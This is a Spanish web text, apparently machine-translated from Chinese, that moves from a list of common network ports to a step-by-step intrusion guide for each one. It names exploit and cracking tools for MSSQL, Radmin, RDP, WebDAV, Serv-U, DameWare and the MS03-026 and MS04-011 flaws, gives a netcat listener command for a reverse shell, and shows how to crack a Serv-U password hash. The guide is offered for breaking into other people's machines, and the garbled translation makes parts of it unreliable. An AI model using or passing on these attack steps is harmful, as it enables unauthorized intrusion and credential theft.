¿Cuáles son los puertos de red comunes? Las aplicaciones correspondientes se explican respectivamente.
21/tcp Protocolo de transferencia de archivos FTP
22/tcp SSH inicio de sesión seguro, transferencia de archivos (SCP) y redirección de puertos
23/tcp Telnet no es seguro Transferencia de texto
25/tcp SMTP Protocolo simple de transferencia de correo (correo electrónico)
69/udp TFTP Protocolo de transferencia de archivos normal
79/tcp dedo dedo
p>Protocolo de transferencia de hipertexto HTTP (WWW) 80/tcp
Proxy de autenticación Kerberos 88/tcp
Protocolo de oficina postal POP3 110/tcp (correo electrónico)
113/tcp identifica el antiguo sistema de servidor de identificación
119/tcp NNTP para grupos de noticias
220/tcp IMAP3
443/tcp HTTPS se utiliza para seguridad transmitir páginas web
1433 intrusión de puerto
Scanport.exe tiene 1433 máquinas.
SQLScanPass.exe rompió el diccionario (el diccionario es la clave)
Finalmente, SQLTools.exe invadió
========== ===================
Para sistemas inferiores a SQL SP2, la vulnerabilidad de desbordamiento de saludo de SQL se puede explotar para intrusión.
Nc -vv -l -p puerto local sqhelelloF.exe invade ip 1433 puerto local ip local.
(Lo anterior se invierte, la prueba es exitosa)
Sqhelelloz.exe invade la ip 1433 (esta es una conexión directa).
Intrusión de puerto 2.4899
Usar filtro 4899. Escanee la máquina usando una contraseña en blanco.
Intrusión de 3.3899
Para máquinas muy antiguas, puede probar el desbordamiento de 3389 (win3389ex.exe)
Para máquinas 2000, puede probar la explosión de diccionario . tscrack.exe
Intrusión 4.80
Para máquinas anteriores a sp3, puede usar webdav para la intrusión;
Para el foro bbs, puede intentar cargar la vulnerabilidad ( upfile.exe o dvup_delphi.exe).
Puedes utilizar SQL para inyección. (Software de inyección de Xiaorong).
Intrusión 5.serv-u (puerto 21)
Para sistemas inferiores a 5. 004, se puede utilizar la intrusión de desbordamiento. serv5004.exe
Para sistemas con versiones 5.1.0.0 e inferiores, puede actualizar los permisos localmente. servlocal.exe
======================================= p>
La contraseña cifrada MD5 de serv-u se puede descifrar usando un diccionario. (crack.vbs)
Ingrese una contraseña (de 34 bits de longitud) cifrada por serv-u y compárela con un archivo de diccionario (dict.txt) para obtener la contraseña
. Tales como: craqueo de cscript. EBV ib0a 10648 f 17e 9e 8d 1ff 316105 a.
6. Puerto 554
Utilice real554.exe para invadir.
7. Puerto 6129
Utilice DameWare6129.exe para invadir.
8. Vulnerabilidades del sistema
Utilice los puertos 135 y 445, aproveche las vulnerabilidades ms03026, ms03039, ms03049 y ms04011,
para realizar una intrusión de desbordamiento.
9.3127 y otros puertos
Puedes usar virus del fin del mundo para abrir puertos y usar nodoom.exe para invadir. (proporcionado en mydoomscan.exe).
10. Otras intrusiones
Utilice el software de intrusión de Lu Shan para la intrusión.